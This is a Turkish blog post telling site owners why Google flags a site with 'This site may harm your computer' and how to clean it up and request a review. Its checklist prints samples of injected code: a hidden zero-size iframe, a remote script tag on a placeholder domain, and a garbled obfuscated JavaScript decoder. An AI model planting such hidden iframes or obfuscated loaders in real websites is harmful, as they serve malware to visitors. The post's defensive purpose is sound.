Bu site bilgisayarınıza zarar verebilir uyarısı

Bu site bilgisayarınıza zarar verebilir yazısını kaldırmanın yollarını adım adım sizlere anlatacağım.

Reklamlar

Bu site bilgisayarınıza zarar verebilir uyarısı nedir?
Google kullanıcılarını zararlı sitelerden korumak için bu tür uyarı yazısını koymaktadır. Bu yazı konulan site, ya virüsler tarafından saldırıya uğramıştır yada casus yazılımlar içermektedir.
Bu uyarının amacı kullanıcıları sitelerden uzak tutmak ve site yöneticisini sitesinde casus yazılım olduğundan yada virüs bulunduğundan haberdar etmektir. Yahoo arama sonuçlarındada benzer uyarı yazısı bulunmaktadır.

Site yöneticisi bu yazının ne anlama geldiğini neden böyle bir yazı ile kullanıcıların Google üzerinden sitelerine girilmesine engel olunduğunu bilmek ister.

Google siteyi hangi sebeplerle bu site bilgisayarınıza zarar verebilir diye işaretler?
Bunu bir kaç şekilde açıklamak eminim daha yararlı olacaktır.

1. Siteniz hacklenmiş olabilir. Sitenizi siz farkında olmadığınız halde hackleyen kişi, sitenize zararlı kod, zararlı koda yönlendirme, yada .htacces dosyasınızda değişiklik yaparak sitenizde casus yazılım, zararlı içerik bulundurmanızı sağlayabilir.

2. Sitenize eklediğiniz herhangi bir koddan kaynaklanabilir. Bu kod sitenizi eklediğiniz zararlı toplist, sitenize eklediğiniz “src = http://siteadi” ile başlayan PHP kodlarından gelebilmektedir. Bunlardan başka ayrıca reklamlar, top10 siteleri, sayaçları bulunan siteler gibi sitelerindeki virüsleri yada casus yazılımları diğer sitelere gönderebilen sitelerden gelebilir.

3. Flash dosyaları ve swf dosyaları sitenize virüs bulaştırabilir.

4. Siteniz üzerinde kötü amaçlı yazılım bulunduğundan yada kötü amaçlı casus yazılımlara bağlantı verdiğinizden kaynaklanabilir.

StopBadware, Google’da kötü amaçlı yazılımlara ve virüslere karşı Google’a yardımcı olmaktadır. Sitenizdeki sorunlara yardımcı olması açısından sizin haberiniz olmadan eklenen yada sizin eklediğiniz şu kodları lütfen kontrol ediniz. İşte o kodlar;

<iframe src=” http://hgfdetre.com /path/file” width=”0″ height=”0″ frameborder=”0″ style=”display:none”> </ IFRAME>

language=”JavaScript” <script src=” http://gfgffghfghfg.com /path/file.js”> </ script>

<script language=”JavaScript”> işlevi nbsp () (var t, o, l, i, j; var =”s; s + =’47116101120 ‘; s + =’097114099111’; s = s +’1203403211910 ‘; var = s +’7121058110111112 ‘; s = s +’9062032’; t =”; l = s.length; i = 0; while (i <(l-1)) ((j = 0; J <3; J + + ) (t + = s.charAt (i); i + +;) if (((0xBF))> unscape (0x00)) t-=- (uescape (0x08) + unescae (0x30)); nescape doc.rite t ( String.froCharCode (t)); değil =”;}} nbsp (); </ script>

Zararlı içeriği tespit edip kaldırdıktan sonra, izlemenizi önerdiğim yol:

1 – Google hesabınızla Araçlar’a giriş yapın.
2 – Kontrol panelinden sitenizi seçin.
3 – Genel Bakış sayfasındaki İnceleme talebinde bulunun’u tıklayın ve sonrasında anlatılan adımları uygulayın.

Siteniz kısa zamanda incelenir ve zararlı içeriğin ortadan kalktığına emin olunduğu takdirde, arama sonuçlarındaki uyarı da kaldırılır.

Sponsorlu Bağlantılar

Yorum yapın